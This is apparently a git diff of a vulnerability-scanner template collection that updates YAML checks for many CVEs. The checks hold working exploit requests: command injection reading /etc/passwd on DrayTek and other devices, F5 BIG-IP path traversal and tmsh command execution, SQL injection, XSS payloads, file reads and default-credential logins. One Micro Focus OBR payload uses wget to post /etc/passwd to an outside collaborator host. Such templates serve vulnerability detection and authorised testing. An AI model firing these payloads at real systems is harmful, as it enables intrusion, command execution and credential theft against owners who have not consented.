+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: id,en-US;q=0.7,en;q=0.3
+ DNT: 1
+ Connection: close
Cookie: uid=6gPjT2ipmNz
+ Upgrade-Insecure-Requests: 1
+ Content-Length: 0
username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
- | # Get /etc/passwd
GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: id,en-US;q=0.7,en;q=0.3
+ DNT: 1
+ Connection: close
Cookie: uid=6gPjT2ipmNz
+ Upgrade-Insecure-Requests: 1
+ Content-Length: 0
matchers-condition: and
matchers:
- type: status
status:
- 200
-
- type: regex
regex:
- "nobody:[x*]:65534:65534"
- - "root:.*:0:0:"
+ - "root:.*:0:0"
condition: or
-
-# Enhanced by mp on 2022/07/13
diff --git a/poc/cve/CVE-2020-25078.yaml b/poc/cve/CVE-2020-25078.yaml
index 16195b1423..1789b5371c 100644
--- a/poc/cve/CVE-2020-25078.yaml
+++ b/poc/cve/CVE-2020-25078.yaml
@@ -1,24 +1,15 @@
id: CVE-2020-25078
info:
- name: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure
+ name: D-Link DCS-2530L Administrator password disclosure
author: pikpikcu
severity: high
- description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure.
- reference:
- - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180
- - https://twitter.com/Dogonsecurity/status/1273251236167516161
- - https://nvd.nist.gov/vuln/detail/CVE-2020-25078
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2020-25078
- epss-score: 0.96698
+ description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078
tags: cve,cve2020,dlink
- metadata:
- max-request: 1
-http:
+
+requests:
- method: GET
path:
- "{{BaseURL}}/config/getuser?index=0"
@@ -39,5 +30,3 @@ http:
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/07/15
diff --git a/poc/cve/CVE-2020-27735.yaml b/poc/cve/CVE-2020-27735.yaml
index 31b0f18651..dc84ec8031 100644
--- a/poc/cve/CVE-2020-27735.yaml
+++ b/poc/cve/CVE-2020-27735.yaml
@@ -8,6 +8,11 @@ info:
An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735
tags: cve,cve2020,xss,wing-ftp
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-27735
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/poc/cve/CVE-2020-35489.yaml b/poc/cve/CVE-2020-35489.yaml
index 57f9fd7798..38c6fb3ae6 100644
--- a/poc/cve/CVE-2020-35489.yaml
+++ b/poc/cve/CVE-2020-35489.yaml
@@ -1,22 +1,30 @@
id: CVE-2020-35489
info:
- name: contacts form
- author: medbsq
+ name: WordPress Contact Form 7 Plugin - Unrestricted File Upload
+ author: soyelmago
severity: critical
+ description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489
+ tags: cve,cve2020,wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"
- headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+
matchers-condition: and
matchers:
- - type: word
- words:
- - "Stable tag:"
- part: body
- type: status
status:
- 200
+
+ - type: word
+ words:
+ - "Contact Form 7"
+ part: body
+
+ - type: regex
+ regex:
+ - '^([0-4]\.|5\.[0-2]\.|5\.3\.[0-1]$)'
+ part: body
\ No newline at end of file
diff --git a/poc/cve/CVE-2020-35736.yaml b/poc/cve/CVE-2020-35736.yaml
index 0a2da783b9..ef1f03d2b5 100644
--- a/poc/cve/CVE-2020-35736.yaml
+++ b/poc/cve/CVE-2020-35736.yaml
@@ -19,7 +19,7 @@ requests:
matchers:
- type: regex
regex:
- - "root:.*:0:0:"
+ - "root:[x*]:0:0:"
- type: status
status:
diff --git a/poc/cve/CVE-2020-35951.yaml b/poc/cve/CVE-2020-35951.yaml
index dcbf8b8b71..8f6e44259c 100644
--- a/poc/cve/CVE-2020-35951.yaml
+++ b/poc/cve/CVE-2020-35951.yaml
@@ -68,7 +68,7 @@ requests:
- "not found in ([/a-z_]+)wp"
req-condition: true
- matchers-condition: or
+ matchers-condition: and
matchers:
- type: word
diff --git a/poc/cve/CVE-2020-36112.yaml b/poc/cve/CVE-2020-36112.yaml
index 142c4a081a..2d227f4e18 100644
--- a/poc/cve/CVE-2020-36112.yaml
+++ b/poc/cve/CVE-2020-36112.yaml
@@ -3,11 +3,9 @@ id: CVE-2020-36112
info:
name: CSE Bookstore 1.0 SQL Injection
author: geeknik
- description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
- reference: |
- - https://www.exploit-db.com/exploits/49314
- - https://www.tenable.com/cve/CVE-2020-36112
- severity: critical
+ description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database.
+ reference: https://www.exploit-db.com/exploits/49314
+ severity: high
tags: cve,cve2020,sqli,cse
requests:
@@ -24,6 +22,34 @@ requests:
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1
+ - |
+ POST /ebook/cart.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+ Connection: close
+ Cache-Control: max-age=0
+ Referer: http://{{Hostname}}/ebook/book.php?bookisbn=978-1-1180-2669-4
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 57
+ Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
+
+ bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
+
+ - |
+ GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+ Connection: close
+ Cache-Control: max-age=0
+ Referer: http://{{Hostname}}/ebook/books.php
+ Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
+
matchers:
- type: word
part: body
diff --git a/poc/cve/CVE-2020-5515.yaml b/poc/cve/CVE-2020-5515.yaml
old mode 100755
new mode 100644
diff --git a/poc/cve/CVE-2020-5902.yaml b/poc/cve/CVE-2020-5902.yaml
index fe6dc5ec18..c0507f572f 100644
--- a/poc/cve/CVE-2020-5902.yaml
+++ b/poc/cve/CVE-2020-5902.yaml
@@ -1,62 +1,85 @@
id: CVE-2020-5902
info:
- name: F5 BIG-IP TMUI RCE
- author: madrobot & dwisiswant0
- severity: high
+ name: F5 BIG-IP TMUI - Remote Code Execution
+ author: madrobot,dwisiswant0,ringo
+ severity: critical
+ description: F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
+ reference:
+ - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html
+ - http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html
+ - http://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html
+ - http://packetstormsecurity.com/files/158414/Checker-CVE-2020-5902.html
+ - http://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html
+ - https://badpackets.net/over-3000-f5-big-ip-endpoints-vulnerable-to-cve-2020-5902/
+ - https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902
+ - https://support.f5.com/csp/article/K52145254
+ - https://swarm.ptsecurity.com/rce-in-f5-big-ip/
+ - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/
+ - https://www.kb.cert.org/vuls/id/290915
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-5902
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-5902
+ cwe-id: CWE-22,CWE-829
+ epss-score: 0.97562
+ tags: cve2020,bigip,rce,kev,packetstorm,cve
+ metadata:
+ max-request: 8
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
+ - "{{BaseURL}}/hsqldb%0a"
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
- "BIG-IP release ([\\d.]+)"
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
+ - "HSQL Database Engine Servlet"
condition: or
- part: body
+
- raw:
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
- Connection: close
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=create%20cli%20alias%20private%20list%20command%20bash
- |
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: {{Hostname}}
- Connection: close
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
- Connection: close
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=list%20%2Ftmp%2Fnonexistent
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
- Connection: close
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=delete%20cli%20alias%20private%20list
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- - "h3ll0_w0Rld"
\ No newline at end of file
+ - "h3ll0_w0Rld"
+
+# Enhanced by mp on 2022/04/28
diff --git a/poc/cve/CVE-2020-8115.yaml b/poc/cve/CVE-2020-8115.yaml
index b404c7d217..34775d22a2 100644
--- a/poc/cve/CVE-2020-8115.yaml
+++ b/poc/cve/CVE-2020-8115.yaml
@@ -1,4 +1,4 @@
-id: cve-2020-8115
+id: CVE-2020-8115
info:
name: Revive Adserver XSS
diff --git a/poc/cve/CVE-2020-8191.yaml b/poc/cve/CVE-2020-8191.yaml
index 137397c3ee..87c0635817 100644
--- a/poc/cve/CVE-2020-8191.yaml
+++ b/poc/cve/CVE-2020-8191.yaml
@@ -1,48 +1,33 @@
id: CVE-2020-8191
info:
- name: Citrix ADC/Gateway - Cross-Site Scripting
+ name: Citrix ADC & NetScaler Gateway Reflected XSS
+ # Leads to RCE
author: dwisiswant0
- severity: medium
- description: |
- Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.
- reference:
- - https://support.citrix.com/article/CTX276688
- - https://nvd.nist.gov/vuln/detail/CVE-2020-8191
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2020-8191
- cwe-id: CWE-79
- epss-score: 0.00223
- tags: cve,cve2020,citrix,xss
- metadata:
- max-request: 1
+ severity: high
-http:
+requests:
- raw:
- |
POST /menu/stapp HTTP/1.1
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ DNT: 1
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Content-Length: 96
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: xpyZxwy6
sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot
-
matchers-condition: and
matchers:
- type: word
words:
- ""
part: body
-
- type: status
status:
- 200
-
- - type: word
- words:
- - "text/html"
- part: header
-
-# Enhanced by mp on 2022/09/02
diff --git a/poc/cve/CVE-2020-8515.yaml b/poc/cve/CVE-2020-8515.yaml
index 05ec699777..21148d4956 100644
--- a/poc/cve/CVE-2020-8515.yaml
+++ b/poc/cve/CVE-2020-8515.yaml
@@ -5,21 +5,19 @@ info:
author: pikpikcu
severity: critical
description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.
- reference:
+ reference: |
- https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
- https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
tags: cve,cve2020,rce
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
- cve-id: CVE-2020-8515
- cwe-id: CWE-78
requests:
- raw:
- |
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: */*
+ Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
diff --git a/poc/cve/CVE-2020-8644.yaml b/poc/cve/CVE-2020-8644.yaml
index 6d66fa8fa8..9f91299c9c 100644
--- a/poc/cve/CVE-2020-8644.yaml
+++ b/poc/cve/CVE-2020-8644.yaml
@@ -32,7 +32,7 @@ requests:
X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=
cookie-reuse: true
- host-redirects: true
+ redirects: true
max-redirects: 2
extractors:
- type: xpath
@@ -55,4 +55,4 @@ requests:
status:
- 200
-# Enhanced by mp on 2022/07/07
\ No newline at end of file
+# Enhanced by mp on 2022/07/07
diff --git a/poc/cve/CVE-2020-8982.yaml b/poc/cve/CVE-2020-8982.yaml
index 93cb4b4014..f666b4e92d 100644
--- a/poc/cve/CVE-2020-8982.yaml
+++ b/poc/cve/CVE-2020-8982.yaml
@@ -1,44 +1,23 @@
id: CVE-2020-8982
info:
- name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read
+ name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
author: dwisiswant0
severity: high
- description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.
- reference:
- - https://support.citrix.com/article/CTX269106
- - https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view
- - https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/
- - https://nvd.nist.gov/vuln/detail/CVE-2020-8982
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2020-8982
- cwe-id: CWE-22
- cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:*
- epss-score: 0.72182
- tags: cve,cve2020,citrix,lfi
- metadata:
- max-request: 1
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
-
matchers-condition: and
matchers:
-
+ - type: status
+ status:
+ - 200
- type: word
- part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/06/27
+ part: body
\ No newline at end of file
diff --git a/poc/cve/CVE-2021-20150.yaml b/poc/cve/CVE-2021-20150.yaml
index 07d01288a7..deb050990a 100644
--- a/poc/cve/CVE-2021-20150.yaml
+++ b/poc/cve/CVE-2021-20150.yaml
@@ -5,6 +5,8 @@ info:
author: gy741
severity: medium
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
+ remediation: |
+ Update the router firmware to the latest version to fix the vulnerability.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
@@ -12,12 +14,18 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-20150
- cwe-id: CWE-287
+ cwe-id: CWE-306
+ epss-score: 0.14411
+ epss-percentile: 0.95182
+ cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*
metadata:
+ max-request: 1
+ vendor: trendnet
+ product: tew-827dru_firmware
shodan-query: http.html:"TEW-827DRU"
tags: disclosure,router,tenable,cve,cve2021,trendnet
-requests:
+http:
- raw:
- |
POST /apply_sec.cgi HTTP/1.1
@@ -27,10 +35,6 @@ requests:
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
-
- type: word
part: body
words:
@@ -45,12 +49,16 @@ requests:
words:
- "text/html"
+ - type: status
+ status:
+ - 200
+
extractors:
- type: regex
- part: body
name: password
group: 1
regex:
- ''
+ part: body
-# Enhanced by mp on 2022/04/05
+# digest: 490a00463044022046aa199ad85133757e14eb580e9862b4e41bbef8b9ccca9b8a8807d4e9c3bd7402206bcef1ad451255b30a7ddb6567fe3de67ec1e2f13aee3d8e3c6196853b649663:922c64590222798bb761d5b6d8e72950
diff --git a/poc/cve/CVE-2021-21816.yaml b/poc/cve/CVE-2021-21816.yaml
index 1454d889c9..976e4d98e1 100644
--- a/poc/cve/CVE-2021-21816.yaml
+++ b/poc/cve/CVE-2021-21816.yaml
@@ -1,19 +1,24 @@
id: CVE-2021-21816
info:
- name: D-LINK DIR-3040 - Syslog Information Disclosure
- description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.
+ name: D-Link DIR-3040 1.13B03 - Information Disclosure
author: gy741
severity: medium
- reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
- tags: cve,cve2021,dlink,exposure,router,syslog
+ description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
+ reference:
+ - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21816
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
- cvss-score: 4.30
+ cvss-score: 4.3
cve-id: CVE-2021-21816
cwe-id: CWE-922
+ epss-score: 0.00237
+ tags: cve,cve2021,dlink,exposure,router,syslog
+ metadata:
+ max-request: 1
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/messages"
@@ -31,3 +36,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by md on 2023/02/01
diff --git a/poc/cve/CVE-2021-22502.yaml b/poc/cve/CVE-2021-22502.yaml
index a321359dd9..836561af0f 100644
--- a/poc/cve/CVE-2021-22502.yaml
+++ b/poc/cve/CVE-2021-22502.yaml
@@ -1,14 +1,12 @@
id: CVE-2021-22502
-
info:
name: Micro Focus Operation Bridge Reporter (OBR) RCE
author: pikpikcu
severity: critical
reference: |
- https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502
+ https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502
tags: cve,cve2021,obr,rce
-
requests:
- raw:
- |
@@ -25,18 +23,15 @@ requests:
{"userName":"something `wget --post-file /etc/passwd burpcollaborator.net`","credential":"whatever"}
matchers-condition: and
matchers:
-
- type: word
words:
- "application/json"
part: header
-
- type: word
words:
- "An error occurred. Please contact your system administrator"
part: body
condition: and
-
- type: status
status:
- 401
diff --git a/poc/cve/CVE-2021-24286.yaml b/poc/cve/CVE-2021-24286.yaml
index e3b6286721..44f7dffcf1 100644
--- a/poc/cve/CVE-2021-24286.yaml
+++ b/poc/cve/CVE-2021-24286.yaml
@@ -1,5 +1,4 @@
id: CVE-2021-24286
-
info:
name: Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting
author: geeknik
@@ -7,12 +6,10 @@ info:
reference: https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27
severity: medium
tags: cve,cve2021,xss
-
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/options-general.php?page=moove-redirect-settings&tab=\" onMouseOver=\"alert(1);"
-
matchers-condition: and
matchers:
- type: word
diff --git a/poc/cve/CVE-2021-3017.yaml b/poc/cve/CVE-2021-3017.yaml
index 0967f3f37a..5a60c6d460 100644
--- a/poc/cve/CVE-2021-3017.yaml
+++ b/poc/cve/CVE-2021-3017.yaml
@@ -4,8 +4,15 @@ info:
name: Intelbras WIN 300/WRN 342 Disclosure
author: pikpikcu
severity: high
- reference: https://nvd.nist.gov/vuln/detail/CVE-2021-3017
- tags: cve,cve2021,exposure
+ description: The web interface on Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.
+ reference:
+ - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-3017
+ tags: cve,cve2021,exposure,router
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-3017
requests:
- method: GET
@@ -17,9 +24,16 @@ requests:
- type: word
words:
- 'def_wirelesspassword ='
- - 'def_SSID ='
+ - 'Interactive Console
"
part: body
-
-# digest: 4a0a00473045022013ddd4960a4aea793abed2a46e4120c2dd2122fd149ec908a73cee9671ad065c022100cf561fa7d30e0f52d52a4b79c30869367c884abf9b90d158eaece619373644f4:922c64590222798bb761d5b6d8e72950
diff --git a/poc/debug/wordpress-debug-log-11258.yaml b/poc/debug/wordpress-debug-log-11258.yaml
index dee5e0d057..25e5e05c1e 100644
--- a/poc/debug/wordpress-debug-log-11258.yaml
+++ b/poc/debug/wordpress-debug-log-11258.yaml
@@ -1,9 +1,11 @@
id: wp-debug-log
+
info:
name: WordPress debug log
author: geraldino2 & @dwisiswant0
severity: low
tags: wordpress,log
+
requests:
- method: GET
path:
@@ -22,4 +24,4 @@ requests:
part: body
- type: status
status:
- - 200
+ - 200
\ No newline at end of file
diff --git a/poc/default/activemq-default-login-47.yaml b/poc/default/activemq-default-login-47.yaml
index a4dea884a5..ae5ac0f72c 100644
--- a/poc/default/activemq-default-login-47.yaml
+++ b/poc/default/activemq-default-login-47.yaml
@@ -1,18 +1,18 @@
id: activemq-default-login
-
info:
name: Apache ActiveMQ Default Login
author: pdteam
severity: medium
+ description: Apache ActiveMQ default login information was discovered.
+ reference:
+ - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
tags: apache,activemq,default-login
-
requests:
- raw:
- |
GET /admin/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
-
payloads:
username:
- user
@@ -26,4 +26,6 @@ requests:
words:
- 'Welcome to the Apache ActiveMQ Console of '
- 'Broker
'
- condition: and
\ No newline at end of file
+ condition: and
+
+# Enhanced by mp on 2022/03/07
diff --git a/poc/default/aem-default-get-servlet-139.yaml b/poc/default/aem-default-get-servlet-139.yaml
index 274b345439..7186c2256f 100644
--- a/poc/default/aem-default-get-servlet-139.yaml
+++ b/poc/default/aem-default-get-servlet-139.yaml
@@ -1,26 +1,15 @@
id: aem-default-get-servlet
-
info:
- name: AEM DefaultGetServlet
author: DhiyaneshDk
+ name: AEM DefaultGetServlet
severity: low
- description: Sensitive information might be exposed via AEM DefaultGetServlet.
- reference:
- - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
- - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
- tags: aem,adobe
+ reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
+ tags: aem
+
requests:
- method: GET
path:
- - '{{BaseURL}}/etc'
- - '{{BaseURL}}/var'
- - '{{BaseURL}}/apps'
- - '{{BaseURL}}/home'
- - '{{BaseURL}}///etc'
- - '{{BaseURL}}///var'
- - '{{BaseURL}}///apps'
- - '{{BaseURL}}///home'
- '{{BaseURL}}/.json'
- '{{BaseURL}}/.1.json'
- '{{BaseURL}}/....4.2.1....json'
diff --git a/poc/default/ambari-default-login.yaml b/poc/default/ambari-default-login.yaml
index e251839b56..75b4ec03c1 100644
--- a/poc/default/ambari-default-login.yaml
+++ b/poc/default/ambari-default-login.yaml
@@ -1,11 +1,16 @@
id: ambari-default-login
-
info:
name: Apache Ambari Default Login
author: pdteam
- severity: medium
+ description: An Apache Ambari default admin login was discovered.
+ severity: high
+ reference:
+ - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
tags: ambari,default-login,apache
-
requests:
- raw:
- |
@@ -24,3 +29,5 @@ requests:
- '"Users" : {'
- 'AMBARI.'
condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/poc/default/apisix-default-login-490.yaml b/poc/default/apisix-default-login-490.yaml
index c16b0c60b1..d89104b847 100644
--- a/poc/default/apisix-default-login-490.yaml
+++ b/poc/default/apisix-default-login-490.yaml
@@ -1,13 +1,22 @@
id: apisix-default-login
+
info:
- name: Apache Apisix Default Login
+ name: Apache Apisix Default Admin Login
author: pdteam
- severity: critical
- tags: apisix,apache,default-login
+ severity: high
+ description: An Apache Apisix default admin login was discovered.
+ reference:
+ - https://apisix.apache.org/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
metadata:
shodan-query: title:"Apache APISIX Dashboard"
fofa-query: title="Apache APISIX Dashboard"
product: https://apisix.apache.org
+ tags: apisix,apache,default-login
+
requests:
- raw:
- |
@@ -18,20 +27,25 @@ requests:
